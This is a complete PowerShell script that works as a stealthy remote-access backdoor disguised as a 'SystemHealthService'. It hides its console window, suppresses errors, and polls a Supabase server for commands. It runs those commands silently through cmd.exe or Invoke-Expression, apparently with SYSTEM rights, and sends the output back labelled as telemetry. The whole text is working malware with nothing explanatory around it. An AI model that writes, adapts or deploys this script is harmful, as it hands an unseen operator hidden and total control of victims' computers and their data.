$ErrorActionPreference="SilentlyContinue";$ProgressPreference="SilentlyContinue"
try{Add-Type -Name W -Namespace N -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,Int32 n);';[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0)}catch{}
$p="C:\ProgramData\SystemHealthService";while(!(Test-Connection -ComputerName "8.8.8.8" -Count 1 -Quiet)){Start-Sleep 5};Start-Sleep 5
$cfg=Get-Content "$p\config.json" -Raw|ConvertFrom-Json;$idf="$p\device_id.txt"
$mw=60;$wd=0;while(!(Test-Path $idf)-and $wd -lt $mw){Start-Sleep 5;$wd+=5}
if(!(Test-Path $idf)){$did=[guid]::NewGuid().ToString();$did|Out-File $idf -NoNewline}else{$did=(Get-Content $idf -Raw).Trim()}
$h=@{"apikey"=$cfg.supabase_key;"Authorization"="Bearer $($cfg.supabase_key)";"Content-Type"="application/json";"Prefer"="return=minimal"}
function I{param($e,$m="GET",$b=$null);$uri="$($cfg.supabase_url)/rest/v1/$e";try{if($b){Invoke-RestMethod -Uri $uri -Method $m -Headers $h -Body ($b|ConvertTo-Json -Depth 10 -Compress) -TimeoutSec 30}else{Invoke-RestMethod -Uri $uri -Method $m -Headers $h -TimeoutSec 30}}catch{$null}}
function AC{param($cmd);try{$pi=New-Object System.Diagnostics.ProcessStartInfo;$pi.FileName="cmd.exe";$pi.Arguments="/c $cmd";$pi.RedirectStandardOutput=$true;$pi.RedirectStandardError=$true;$pi.UseShellExecute=$false;$pi.CreateNoWindow=$true;$pr=New-Object System.Diagnostics.Process;$pr.StartInfo=$pi;$pr.Start()|Out-Null;$o=$pr.StandardOutput.ReadToEnd();$e=$pr.StandardError.ReadToEnd();$pr.WaitForExit(60000);@{data_type="cmd_result";data=(@{command=$cmd;output=$o;error=$e;exit_code=$pr.ExitCode;executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}catch{@{data_type="cmd_result";data=(@{command=$cmd;error="$_";executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}}
function AP{param($cmd);try{$o=Invoke-Expression $cmd 2>&1|Out-String;@{data_type="cmd_result";data=(@{command=$cmd;output=$o;executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}catch{@{data_type="cmd_result";data=(@{command=$cmd;error="$_";executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}}
$si=if($cfg.sync_interval){$cfg.sync_interval}else{60};$ri=if($cfg.retry_interval){$cfg.retry_interval}else{60}
while($true){try{$ts=I -e "tasks?device_id=eq.$did&status=eq.pending&task_type=in.(cmd_exec_admin,ps_exec_admin)&select=id,task_type,task_params";if($ts){if($ts -isnot [array]){$ts=@($ts)};foreach($t in $ts){$tl=$null;switch($t.task_type){"cmd_exec_admin"{$cmd="";if($t.task_params -and $t.task_params.command){$cmd=$t.task_params.command};if($cmd){$tl=AC -cmd $cmd}else{$tl=@{data_type="cmd_result";data="No command"}}}"ps_exec_admin"{$cmd="";if($t.task_params -and $t.task_params.command){$cmd=$t.task_params.command};if($cmd){$tl=AP -cmd $cmd}else{$tl=@{data_type="cmd_result";data="No command"}}}};if($tl){$bd=@{device_id=$did;data_type=$tl.data_type};if($tl.data){$bd.data=$tl.data};I -e "telemetry" -m "POST" -b $bd|Out-Null;I -e "tasks?id=eq.$($t.id)" -m "PATCH" -b @{status="complete";completed_at=(Get-Date -Format "o")}|Out-Null}}};Start-Sleep $si}catch{Start-Sleep $ri}}
